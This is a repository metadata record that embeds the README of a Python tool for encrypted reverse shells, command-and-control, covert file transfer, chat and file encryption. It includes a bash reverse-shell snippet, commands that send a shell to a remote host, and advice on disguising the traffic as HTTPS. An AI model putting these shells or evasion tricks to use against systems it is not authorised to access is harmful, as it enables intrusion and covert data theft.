{"id":15149943,"url":"https://github.com/0x00wolf/virtual-privacy","last_synced_at":"2025-04-09T11:26:37.517Z","repository":{"id":221613739,"uuid":"748473856","full_name":"0x00wolf/virtual-privacy","owner":"0x00wolf","description":"A Pythonic Swiss-Army knife for conducting covert communications over insecure networks, generating encrypted reverse-shells, file transfers, and secure data storage.","archived":false,"fork":false,"pushed_at":"2024-02-24T15:29:22.000Z","size":376,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-15T05:25:18.816Z","etag":null,"topics":["covert-channel","data-exfiltration","encrypt-folders","encrypted-files","encrypted-messages","encrypted-reverse-shells","encrypting-data","end-to-end-encryption","network-protocol","reverse-shell-generator","reverse-shells","secure-communication-protocol","secure-file-sharing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0x00wolf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-01-26T03:25:22.000Z","updated_at":"2024-07-19T18:22:47.000Z","dependencies_parsed_at":"2024-02-09T02:11:36.104Z","dependency_job_id":"f321009c-5697-4eed-b3fa-8bf30ff5d578","html_url":"https://github.com/0x00wolf/virtual-privacy","commit_stats":{"total_commits":107,"total_committers":1,"mean_commits":107.0,"dds":0.0,"last_synced_commit":"500ffd0aee8b95ad5e382d744ff0fa3c80586fa5"},"previous_names":["0x00wolf/virtual-privacy"],"tags_count":0,"template"
:false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0x00wolf%2Fvirtual-privacy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0x00wolf","download_url":"https://codeload.github.com/0x00wolf/virtual-privacy/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248029750,"owners_count":21036052,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["covert-channel","data-exfiltration","encrypt-folders","encrypted-files","encrypted-messages","encrypted-reverse-shells","encrypting-data","end-to-end-encryption","network-protocol","reverse-shell-generator","reverse-shells","secure-communication-protocol","secure-file-sharing"],"created_at":"2024-09-26T14:01:36.701Z","updated_at":"2025-04-09T11:26:37.480Z","avatar_url":"https://github.com/0x00wolf.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Virtual-Privacy\n\nVirtual-Privacy (VP) is a Pythonic Swiss army knife for conducting covert communications over insecure networks, and secure data storage. 
VP features 4 levels of encryption, 24 host iterations (command and control, file transfers, and a chatroom), and a number of options for generating credentials. VP additionally offers the ability to encrypt a file, directory, or an entire path recursively. VP features a unique network security protocol that emulates and incorporates popular protocols like SSH, PGP, and SSL. \n\nIt should be noted, the host operation, chat, is styled after AOL chat rooms circa 1999, but with the added feature of layered encryption to create a communication medium suitable for individuals working in contemporary spycraft.\n\n---\n\n## In this README.md:\n\nYou will find a comprehensive manual that will teach you how to use all of the easy features that the program offers to conduct covert communications, and encrypted data storage!\n\n\n---\n\n\n## Index:\n\n1) [Installation](#installation)\n2) [Host Operations](#host-operations)\n3) [Levels of Encryption](#levels-of-encryption)\n4) [Generate Credentials](#generate-credentials)\n5) [Database Operations](#database-operations)\n6) [Encryption \u0026 Decryption](#encryption_and_decryption)\n\n\n---\n\n## Installation\n\nVP uses one non-standard Python library, `pycryptodome`. \n\nVP also requires OpenSSL.\n\n**To install Virtual-Privacy:**\n\n1) Download Virtual-Privacy:\n\n```bash\ngit clone https://github.com/0x00wolf/virtual-privacy\n```\n\n2) Navigate to the parent directory:\n\n```bash\ncd ./virtual-privacy\n```\n\n3) Create a virtual environment, activate it, and install pycryptodome:\n\n```bash\npython -m venv venv \u0026\u0026 source ./venv/bin/activate \u0026\u0026 pip install pycryptodome\n```\n\n4) Generate some credentials, throw some reverse shells, and have fun!\n\n**At runtime:** The program will check to see if the following directories exist in the program's parent directory or it will generate them: ./keys/local, ./keys/remote, and ./data. 
The program uses the runtime `--user` | `-u` argument to select the SQL database to use, allowing users to create multiple databases for different purposes by simply creating a new user key. See [user](#user) for more information.\n\n---\n\n\n## Host Operations\n\n`--server` | `-s` \u0026 `--client` | `-c`\n\nBoth client and server operating modes feature 12 iterations on 3 host \narchetypes: Command \u0026 Control (c2), File Transfers (ftp), \u0026 Chatroom (chat).\n\nEach operating mode has 4 variations, relative to the different encryption \nlevels VP offers. The user simply needs to supply the required credentials \nfor the desired operating mode, and VP will select the correct host at \nruntime. For more information on VP's encryption options, see: \n[VP Encryption Options](#vp-encryption-options). \n\nRequired Args:\n- Mode: `--client OPERATION` | `-c OPERATION` or `--server OPERATION` | `-s OPERATION`\n\nOperations:\n- `c2`: See [c2](#c2)\n- `ftp`: See [ftp](#ftp)\n- `chat`: See [chat](#chat)\n\nOptional Server Args:\n- `--host` | `-ip`: Hostname or IPv4 address. Defaults to loopback for testing, `127.0.0.1`.\n- `--port` | `-p`: Port number. Defaults to 1337.\n- `--only-ssl` | `-os`: Required for the server to use SSL without VPP. See: [Levels of Encryption](#levels-of-encryption)\n- `--user` | `-u`: Generate a new, or reference an existing, SQL database. See: [user](#user)\n- `--private-key` | `-pr`: Path to the user's RSA private key.\n- `--certificate` | `-crt`: Path to the server's signed x509 certificate.\n\nOptional Client Args:\n- `--host` | `-ip`: Hostname or IPv4 address. Defaults to loopback for testing, `127.0.0.1`.\n- `--port` | `-p`: Port number. Defaults to 1337.\n- `--only-ssl` | `-os`: Required for the server to use SSL without VPP. See: [Levels of Encryption](#levels-of-encryption)\n- `--user` | `-u`: Generate a new, or reference an existing, SQL database. 
See: [user](#user)\n- `--private-key` | `-pr`: Path to the user's RSA private key.\n- `--public-key` | `-pu`: Path to the remote server's RSA public key. \n- `--certificate` | `-crt`: Path to the server's signed x509 certificate.\n- `--target` | `-t`: Sets the saved parameters for `target` server nickname.\n\nBasic Usage:\n\n```bash\n# Long form:\npython vp.py --server OPERATION\npython vp.py --client OPERATION\n\n# Short form:\npython vp.py -s c2\npython vp.py -c c2\n```\n\n---\n\n### **c2**\n\n`python vp.py --server c2`\n\nVP's Command \u0026 Control mode sends a Pythonic reverse shell from the client \nto the server:\n\n`subprocess.Popen['python', '-i', ,'import pty', 'pty.spawn('/bin/bash')]` \n\nThe client runs the shell in a subprocess and uses Pipes to funnel the stdin, stdout \u0026 \nstderr over the network connection, allowing VP to encrypt the data streams \nin the process. VP uses multithreading, pipes, and queues to create a \nsmooth reverse shell experience, while encrypting data in transit.  \n\n\n---\n\n\n### ftp\n\n`python vp.py --client ftp`\n\nVP's ftp transfers allow for secure data transfer. Alternatively, you can \nuse VP's file encryption to encrypt a file in advance of transfer so that \nonly the intended recipient will be able to decrypt it. Pairing file \nencryption with secure data transmission makes for a very high degree of \nsecurity.\n\n\n---\n\n\n### chat\n\n`python vp.py -s chat`\n\nVP's Chat is styled after an AOL chatroom from 1999, but with heavy layers of modern encryption. \n\nAfter a client connects, the server will decrypt messages from each client, and then broadcast them to every connected client, encrypting each with their respective credentials (depending on the encryption level in use). The chatroom uses multithreading, and is conceivably capable of handling hundreds if not thousands of concurrent hosts, although that isn't very secretive. \n\nThe Chatroom was the initial inspiration for this project. 
I thought it would be funny to create an AOL chatroom that would be suitable for high level threat actors. A lot of my projects begin this way. I had a silly idea that I started to build, and then realized cool things I could make it do.\n\n\n---\n\n\n## Levels of Encryption\n\n1) [Base64](#base64)\n2) [SSL](#ssl)\n3) [VPP](#vpp)\n4) [SSL and VPP](#vpp_and_ssl)\n\n\n---\n\n\n## Base64\n\nBy default all communications are encoded with Base64. Although this \ndoesn't provide confidentiality, integrity, or authenticity, it provides a \nbase layer of obfuscation to communications, which is often used by threat \nactors while acquiring a foothold on a new network.\n\n**Level 1: Base64 examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337\n```\n\n\nClient-side:\n\n```bash\n# Client-side long form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337\n```\n\n---\n\n\n### SSL\n\nVP's second level of encryption allows users to encrypt communications with \nTLSv1.3. SSL provides end-to-end encryption. Alternatively, it also enables \nusers to mask their communications as regular traffic, particularly if they \nutilize a common port like 443, or 853 for the server connection, which \nwould make traffic look like HTTPS, DoT, or DoH.\n\nSee [Generate Credentials](#generate-credentials) for VP's built in options \nfor producing the required credentials. 
Fast-gen, [fast-gen](#fast-gen), in particular, will \nimmediately spit out everything you need.\n\n\n**Server args:**\n- `--private-key` | `-pr`: The RSA private key used to either self-sign the x509 certificate, or create the certificate signing request signed by a root CA.\n- `--certificate` | `-crt`: The signed x509 certificate\n- `--only-ssl` | `-os`: VPP \u0026 SSL have the same requirements for credentials, so this argument is necessary to inform VP to only use SSL. \n\n**Client args:**\n- `--certificate` | `-crt`: Either the root CA signed certificate, or a server self-signed certificate.\n\n**Level 2: SSL examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./key.pem --certificate ./cert.crt --only-ssl\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./key.pem -crt ./cert. -os\n```\n\nClient-side:\n\n```bash\n# Client-side long form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --certificate ./cert.crt\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -crt ./cert.crt\n```\n\n\n---\n\n\n## VPP\n\nThe Virtual Privacy Protocol provides authenticity, confidentiality, and \nintegrity. It utilizes hybrid encryption, and signature verification for each transmission. VPP requires that both parties have exchanged RSA public keys in advance. The server administrator must register the remote user's public key in the runtime SQL database in advance of the client connecting. See [Database Operations](#database_operations), specifically [add-key](#add_key). The client has to provide the server's RSA public key as a runtime argument. 
\nFor detailed information on generating an RSA keypair, see [Generate Credentials](#generate-credentials).\n\nVPP authentication works as follows:\n\n**Client-side:**\n\n1) The client’s plaintext RSA public key is signed using their private key.\n2) The client’s plaintext public key is encrypted with a new 256-bit session key.\n3) The session key is wrapped with the server’s RSA public key.\n4) The wrapped session key is transmitted to the server.\n\n**Server-side:**\n\n1) The server accepts a buffer containing the wrapped key \u0026 VP’s protocol header and attempts to unwrap the key.\n2) If the key was unwrapped, the server accepts a buffer of a size relative to information provided by the protocol header.\n3) The server slices off the first 384 bytes of the payload (the signature), and attempts to decrypt the remainder with the unwrapped key.\n4) The server verifies the contents of the decrypted message are a known RSA public key in the runtime SQL database.\n5) The server verifies that the signature belongs to the owner of the known key.\n\n**After authentication:**\n\nThe client and server continue to use the same steps, however, the composition of the messages changes somewhat. Both client and server prepare a payload containing the ciphertext data, a signature of the data unencrypted, and the wrapped key. A 16 byte fixed length protocol header is transmitted first, which contains a binary string, representing the payload's length in bytes. The receiver then accepts a buffer of that size, and goes about the decryption process. 
The chat server doesn't limit the total size of packets, however both the reverse shell and FTP will transmit in chunks behind the scenes if the ciphertext exceeds a certain length.\n\nFor more information on VPP, see: [vpp](#vpp)\n\nTo generate credentials for VPP, see: [rsa](#rsa)\n\n**Server args:**\n- `--private-key` | `-pr`: The server's RSA private key\n- Clients added to the runtime SQL database: [add-key](#add_key)\n\n**Client args:**\n- `--private-key` | `-pr`: The client's RSA private key.\n- `--public-key` | `-pu`: The server's RSA public key.\n\n**Level 3: VPP Examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./server_privkey.pem\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./server_privkey.pem\n```\n\nClient-side:\n\n```bash\n# Client-side long form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --private-key ./my_privkey.pem --public-key ./server_pubkey.pem\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -pr ./my_privkey.pem -pu ./server_pubkey.pem\n```\n\n\n---\n\n\n## SSL and VPP\n\nVPP wrapped in TLSv1.3 for obfuscation and robust security. 
\n\n**Server args:**\n- `--private-key` | `-pr`: The path to the server's RSA private key\n- `--certificate` | `-crt`: The path to the server's signed x509 certificate.\n- The RSA public keys of remote clients added to the runtime SQL database, see: [add-key](#add_key)\n\n**Level 4: VPP \u0026 SSL Examples**\n\nServer-side:\n\n```bash\n# Server-side long form:\npython vp.py --server c2 --host 0.0.0.0 --port 1337 --private-key ./keys/local/srvr_privkey.pem --certificate ./cert.crt\n\n# Server-side short form:\npython vp.py -s c2 -ip 0.0.0.0 -p 1337 -pr ./keys/local/srvr_privkey.pem -crt ./cert.\n```\n\nClient-side:\n\n```bash\n# Client-side long form:\npython vp.py --client c2 --host 192.168.2.15 --port 1337 --private-key ./keys/local/my_privkey.pem --public-key ./keys/remote/srvr_pubkey.pem --certificate ./cert.crt\n\n# Client-side short form:\npython vp.py -c c2 -ip 192.168.2.15 -p 1337 -pr ./keys/local/my_privkey.pem -pu ./keys/remote/srvr_pubkey.pem -crt ./cert.crt\n```\n\n\n---\n\n\n## Generate Credentials\n\nCredential operations can be accessed via the generate-pki runtime argument:\n\n```bash\n# long form\npython vp.py --generate-pki [OPERATION]\n\n# short form\npython vp.py -pki [OPERATION]\n```\n\nVP provides four options for users to generate credentials. The first option \nuses pycryptodome to generate an RSA key pair, including \noptional private key encryption using best practices. The remaining three \noptions are wrappers for OpenSSL, which allow VP users to generate credentials for \nSSL on the fly, or establish more in depth PKI, including a root \nCertificate Authority. \n\n1) [rsa](#rsa)\n2) [self-sign](#self-sign)\n3) [fast-gen](#fast-gen)\n4) [root-ca](#root-ca)\n\n\n---\n\n\n### rsa\n\n`rsa`\n\nThis function allows the user to generate a new RSA keypair, with optional \npassword encryption. 
\n\nNote: Both optional arguments must be supplied for the program to accept \nthem.\n\nOptional Args:\n- `--private-key` | `-pr`: Supply the export path for the private key in advance\n- `--public-key` | `-pu`: Supply the export path for the public key in advance.\n\n```bash\n\n# Long form:\npython vp.py --generate-pki rsa\n\n# Short form\npython vp.py -pki rsa\n\n# Optional, supply export paths in advance: \npython vp.py -pki rsa --private-key ./keys/local/my_privkey.pem --public-key  ./keys/local/my_pubkey.pem\n```\n\n\n---\n\n\n### self-sign\n\n`self-sign` | `ss`\n\nThis operation takes a preexisting RSA private key and uses it to produce a \nself-signed x509 certificate for establishing SSL. \n\nArgs:\n- `--private-key` | `-pr`: Path to an RSA private key\n\nOptional args:\n- `--certificate` | `-crt`: Optional export path for the signed x509 \ncertificate. \n\nDefault export path: \n- `-crt ./cert.crt`\n\n```bash\n# Long form:\npython vp.py --generate-pki self-sign --private-key ./keys/local/srvr_privkey.pem  \n\n# Short form:\npython vp.py -pki ss -pr ./local/srvr_privkey.pem\n\n# With an optional export path for the certificate\npython vp.py -pki ss -pr ./keys/local/srvr_privkey.pem --certificate ./keys/local/srvr_cert.crt\n```\n\n\n---\n\n\n### **fast-gen**\n\n`fast-gen` | `fg`\n\nThis operation instantly spits out the necessary credentials for \nestablishing a SSL encrypted connection, a new RSA private key and signed \nx509 certificate.\n\nOptional args:\n- `--private-key` | `-pr`: The export path for the RSA private key.\n- `--certificate` | `-crt`: The export path for the signed certificate.\n\nDefaults:\n- `-pr ./key.pem -crt ./cert.crt`\n\n```bash\n# Long form:\npython vp.py --generate-pki fast-gen\n\n# Short form:\npython vp.py -pki fg\n\n```\n\n\n---\n\n\n### **root-ca**\n\n`root-ca` | `ca`\n\nThe `root-ca` operation allows users to interactively generate public \nkey infrastructure. 
The output from this operation includes creating a root \nCertificate Authority, a server RSA keypair, and a CA signed certificate \nfor the server.\n\nTakes no args.\n\n```bash\n# Long form:\npython vp.py --generate-pki root-ca\n\n# Short form:\npython vp.py -pki ca\n```\n\n\n---\n\n\n## Encryption and Decryption\n\n`--encrypt [OPERATION]` | `-e [OPERATION]` \n\u0026 `--decrypt [OPERATION]` | `-d [OPERATION]`\n\nVP features the ability to encrypt or decrypt files, a single directory non-recursively, or a path recursively. You can also add signature authentication into the encryption process. You can additionally sign files as you encrypt them, allowing for additional layers of encryption and authenticity for files hosted with VP's `--server ftp` host operation.\n\n1) [file](#file)\n2) [dir](#dir)\n3) [path](#path)\n\n\n---\n\n\n### file\n\n`file`\n\nVP's file encryption option is useful for remote data transfer. The encryption process is very similar to the VP protocol, with the exception that the wrapped key (and optional RSA signature) are prepended to the file. During [Decryption](#Decryption) they are sliced off and used in the same sequence as described in [VPP](#VPP). \n\nEncryption Required Args:\n- `--file-in` | `-fi`: The file to be encrypted.\n- `--public-key` | `-pu`: The RSA public key of the individual who will decrypt the file.\n\nDecryption required args:\n- `--file-in` | `-fi`: The file to be decrypted.\n- `--private-key` | `-pr`: The matching RSA private key to the public key used for encryption. Used to decrypt the files with VPP.\n\nOptional args:\n- `--file-out` | `-fo`: An optional export path. Note that by using a non-default path, the original unencrypted file will remain in its original location after encryption.\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n- `--public-key` | `-pu`: The RSA public key to verify the signature, if necessary. 
If signature verification was used, decryption will fail without the provided public key, unless you change the code for `crypter.decrypt.signed_file()`.\n\nEncryption examples:\n\n```bash\n# Encryption long form:\npython vp.py --encrypt file --public-key ./keys/remote/Bobcat_public.pem --file-in ./secretmessage.txt\n\n# Encryption short form:\npython vp.py -e f -pu ./keys/remote/Bobcat_public.pem -fi ./secretmessage.txt\n\n# Encryption short form with optional file out and signature authentication:\npython vp.py -e f -pu ./keys/remote/Bobcat_public.pem -pr ./keys/local/my_privkey.pem -fi ./secretmessage.txt -fo ./secret4bobcat.enc\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt file --private-key ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc\n\n# Decrypt short form:\npython vp.py -d f -pr ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc\n\n# Decrypt short form with optional RSA signature verification and a non default export path:\npython vp.py -d f -pr ./keys/local/my_privkey.pem -fi ./path/to/secret4bobcat.enc -pu ./keys/remote/jedi_public.pem -fo ./unencryptedsecret4me.txt\n```\n\n\n---\n\n\n### dir\n\n`dir`\n\nEncrypt a directory, without encrypting files found in any subdirectories. Optional RSA signature authentication is available, but simply due to the fact the same function works behind the scenes to encrypt data. Logically, this operation is a tool for local secure data storage, along with the `path` operation. Other operating modes have equal utility for secure file transfers. 
Note that any file within an encrypted directory or path can be unencrypted with the `--decrypt file` operation ([decrypt file](#decrypt-file)).\n\n\nRequired Args:\n- `--file-in` | `-fi`: The path to the directory that will be encrypted.\n- `--public-key` | `-pu`: The RSA public key of the individual who will decrypt the directory.\n\nOptional args:\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n\nEncryption examples:\n\n```bash\n# Long form:\npython vp.py --encrypt dir --public-key ./keys/local/my_pubkey.pem --file-in /path/to/secrets_directory\n\n# Short form:\npython vp.py -e d -pu ./keys/local/my_pubkey.pem -fi ./path/to/secrets_directory\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt dir --private-key ./keys/local/my_privkey.pem -fi ./path/to/encrypted_dir\n\n# Decrypt short form:\npython vp.py -d d -pr ./keys/local/my_privkey.pem -fi ./path/to/encrypted_dir\n```\n\n\n---\n\n\n### path\n\n`path`\n\nEncrypt a path, recursively encrypting files found in any subdirectories. Optional RSA signature authentication is available, but simply due to the fact the same function works behind the scenes to encrypt data. Logically, this operation is a tool for secure local data storage, along with the following operation, `dir`. 
Note that any file within an encrypted directory or path can be unencrypted with the `--decrypt file` operation ([file](#file)).\n\n\nRequired Args:\n- `--file-in` | `-fi`: The path that will be encrypted.\n- `--public-key` | `-pu`: The RSA public key belonging to the individual who will decrypt the path.\n\nOptional args:\n- `--private-key` | `-pr`: Optional RSA private key to include signature verification in the encryption process.\n\nEncryption examples:\n\n```bash\n# Encrypt long form:\npython vp.py --encrypt path --public-key ./keys/local/my_pubkey.pem --file-in /path/to/secrets_path\n\n# Encrypt short form:\npython vp.py -e p -pu ./keys/local/my_pubkey.pem -fi ./path/to/secrets_path\n```\n\nDecryption examples:\n\n```bash\n# Decrypt long form:\npython vp.py --decrypt path --private-key ./keys/local/my_privkey.pem -fi ./path/to/encrypted_path\n\n# Decrypt short form:\npython vp.py -d p -pr ./keys/local/my_privkey.pem -fi ./path/to/encrypted_path\n```\n\n\n---\n\n\n## Database Operations\n\n`--database` | `-db`\n\nVP is backed by a SQLite3 database, which will be generated at runtime if not found by the program. VPP requires that remote clients' RSA public keys be added to the runtime SQL database. Beyond simply using the public keys for hybrid encryption, VPP uses the keys for authentication.\n\n1) [user](#user)\n2) [target](#target)\n3) [add-key](#add-key)\n4) [show-key](#show-key)\n5) [show-keys](#show-keys)\n6) [delete-key](#delete-key)\n7) [add-target](#add-target)\n8) [show-target](#show-target)\n9) [show-targets](#show-targets)\n10) [delete-target](#delete-target)\n11) [show-tables](#show-tables)\n\n\n---\n\n\n### user\n\n`--user` | `-u`\n\nSet the SQL database name key at runtime to initialize a new database, or reference a pre-existing database. The `--user` argument can be used with the server and client mode to reference a particular database. 
The primary use case here is if you want to establish different runtime databases to limit external clients whose public keys you have added from connecting to a specific server instance. \n\nSaves the database to the data directory, found within VP's parent folder.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database --user Jedi\n```\n\n\n---\n\n\n### target\n\n`--target` | `-t`\n\nThis runtime argument, like `--user`, can be used with multiple operating modes. For database operations it will be utilized to set nicknames when saving RSA public keys (optional) or the information to connect to remote servers (required).\n\n\n---\n\n\n\n### add-key\n\n`add-key`\n\nAdd a remote client's RSA public key to the runtime SQL database.\n\nRequired Args:\n- `--public-key` | `-pu`: The remote user's RSA public key.\n\nOptional Args:\n- `--target` | `-t`: Set a nickname for the public key.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database add-key --public-key ./keys/remote/bobcats_pubkey.pem --target Bobcat\n\n# Short form:\npython vp.py -db ak -pu ./keys/remote/bobcats_pubkey.pem -t Bobcat\n```\n\n\n---\n\n\n### show-key\n\n`show-key` | `sk`    \n\nShow a saved public key by ID or nickname.\n\nArgs:\n- `--target` | `-t`: The target nickname or ID number (shown at creation if no nickname is supplied).\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database show-key --target Jedi\n\n# Short form:\npython vp.py -db sk -t Bobcat\n```\n\n\n---\n\n\n### show-keys\n\n`show-keys`\n\nDisplays information about all the stored keys.\n\n```bash\n# Long form:\npython vp.py --database show-keys\n\n# Short form:\npython vp.py -db show-keys\n```\n\n\n---\n\n\n### delete-key\n\n`delete-key`\n\nArgs:\n- `--target` | `-t`: The target nickname or ID number (shown at creation if no nickname is supplied).\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database delete-key --target Bobcat\n\n# Short form:\npython vp.py -db sk -t Jedi\n```\n\n\n---\n\n\n### 
add-server\n\n`add-server` | `as`    \n\nSave connection information for a remote server in the SQL database. Use the `--target` option at runtime to initialize the variables.\n\nArgs: \n- `--target` | `-t`: Server's nickname.\n- `--host` | `-ip`: The hostname or IPv4 address.\n- `--port` | `-p`: The port.\n\nOptional Args:\n- `--public-key` | `-pu`: The path to the server's public key. \n- `--certificate` | `-crt`: The path to the server's signed x509 certificate.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database add-server --target Jedi --host www.jedibuddy.com --port 1337 --public-key ./keys/remote/jedi_public.pem --certificate ./keys/remote/jedi_cert.crt\n\n# Short form:\npython vp.py -db as -t Jedi -ip www.jedibuddy.com -p 1337 -pu ./keys/remote/jedi_public.pem -crt ./keys/remote/jedi_cert.crt\n```\n\n\n---\n\n\n### show-server\n\n`show-server` | `ss`\n\nRequired Args: \n- `--target` | `-t`:  The target nickname.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database show-server --target Bobcat\n\n# Short form:\npython vp.py -db ss -t Bobcat\n```\n\n\n---\n\n\n### delete-server\n\n`delete-server`\n\nDeletes a target server based on a supplied `--target` nickname.\n\nArgs:\n- `--target` | `-t`: The target nickname.\n\nExample:\n\n```bash\n# Long form:\npython vp.py --database delete-key --target Bobcat\n\n# Short form:\npython vp.py -db sk -t Jedi\n```\n\n\n---\n\n\n### show-servers\n\n`show-servers`\n\nDisplays information about all the stored servers.\n\n```bash\n# Long form:\npython vp.py --database show-servers\n\n# Short form:\npython vp.py -db show-servers\n```\n\n\n---\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x00wolf%2Fvirtual-privacy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0x00wolf%2Fvirtual-privacy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0x00wolf%2Fvirtual-privacy/lists"}